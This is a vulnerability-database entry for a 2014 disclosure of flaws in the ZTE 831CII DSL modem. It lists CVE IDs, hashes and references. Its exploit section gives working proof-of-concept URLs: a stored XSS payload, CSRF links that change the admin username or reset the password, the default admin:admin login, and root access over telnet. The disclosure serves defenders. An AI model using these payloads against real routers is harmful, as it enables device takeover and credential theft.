ID

VAR-E-201411-0052


CVE

cve_id:CVE-2014-9020

Trust: 1.3

cve_id:CVE-2014-9183

Trust: 0.8

cve_id:CVE-2014-9019

Trust: 0.8

cve_id:CVE-2014-9021

Trust: 0.5

sources: BID: 70984 // PACKETSTORM: 129016 // PACKETSTORM: 129017

TITLE

ZTE 831CII Hardcoded Credential / XSS / CSRF

Trust: 0.5

sources: PACKETSTORM: 129016

DESCRIPTION

ZTE 831CII suffers from cross site request forgery, hardcoded administrative credential, and cross site scripting vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 129016

AFFECTED PRODUCTS

vendor:ztemodel:831cii hardcoded credentialscope: - version: -

Trust: 0.5

vendor:ztemodel:zxdslscope:eqversion:831

Trust: 0.5

sources: PACKETSTORM: 129016 // PACKETSTORM: 129017

EXPLOIT

Hardcoded default misconfiguration - The modem comes with admin:admin user credintials.

Stored XSS - http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0
Any user browsing to http://192.168.1.1/main.html will have a stored xss executed!

CSRF based Stored XSS - http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=%27;alert%280%29;//&sysPassword=37F6E6F627B6 - letting an admin visit this link would result the admin username changed to ';alert(0);// also a stored XSS in the home page.

CSRF - there is no token/capcha or even current password prompt when the admin changes the password, and creditintials are sent over GET. PoC: http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=admin&sysPassword=F6C656269697
if an authenticated admin browses that link their credintials will become admin:yibelo

UI Redressing - The modem (like most modems) does not have a clickjacking protection. thus, can be used to modify settings, override admin accounts by a simple clickjack. forexample by using http://192.168.1.1/adminpasswd.html it is possible into tricking an admin submit a form with our credintials (since it doesn't require current password)

not using SSL - The modem does not use HTTPS, so anyone can use MiTM to sniff on going actions, possibly gain user credintials.

Unrestricted privileges - anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that.

Trust: 0.5

sources: PACKETSTORM: 129016

EXPLOIT HASH

LOCAL

SOURCE

md5: df8f43f4159d318dcf19e40ea73398e0
sha-1: d91aceafc4f480516fbcd5e412f66a70cc2d961e
sha-256: 71cb47b2c17ef7f0dfffab54cfb391823034e3c990567867983eacd51e01d6ca
md5: df8f43f4159d318dcf19e40ea73398e0

Trust: 0.5

sources: PACKETSTORM: 129016

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 129016

TYPE

xss, csrf

Trust: 0.5

sources: PACKETSTORM: 129016

TAGS

tag:exploit

Trust: 1.0

tag:vulnerability

Trust: 1.0

tag:xss

Trust: 1.0

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 129016 // PACKETSTORM: 129017

CREDITS

Paulos Yibelo

Trust: 0.5

sources: PACKETSTORM: 129016

EXTERNAL IDS

db:NVDid:CVE-2014-9020

Trust: 1.3

db:NVDid:CVE-2014-9183

Trust: 0.8

db:NVDid:CVE-2014-9019

Trust: 0.8

db:PACKETSTORMid:129016

Trust: 0.5

db:NVDid:CVE-2014-9021

Trust: 0.5

db:PACKETSTORMid:129017

Trust: 0.5

db:BIDid:70984

Trust: 0.3

sources: BID: 70984 // PACKETSTORM: 129016 // PACKETSTORM: 129017

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-9020

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2014-9019

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2014-9183

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2014-9021

Trust: 0.5

sources: PACKETSTORM: 129016 // PACKETSTORM: 129017

SOURCES

db:BIDid:70984
db:PACKETSTORMid:129016
db:PACKETSTORMid:129017

LAST UPDATE DATE

2022-07-27T09:18:46.140000+00:00


SOURCES UPDATE DATE

db:BIDid:70984date:2014-12-09T00:55:00

SOURCES RELEASE DATE

db:BIDid:70984date:2014-11-06T00:00:00
db:PACKETSTORMid:129016date:2014-11-07T16:52:33
db:PACKETSTORMid:129017date:2014-11-07T16:56:04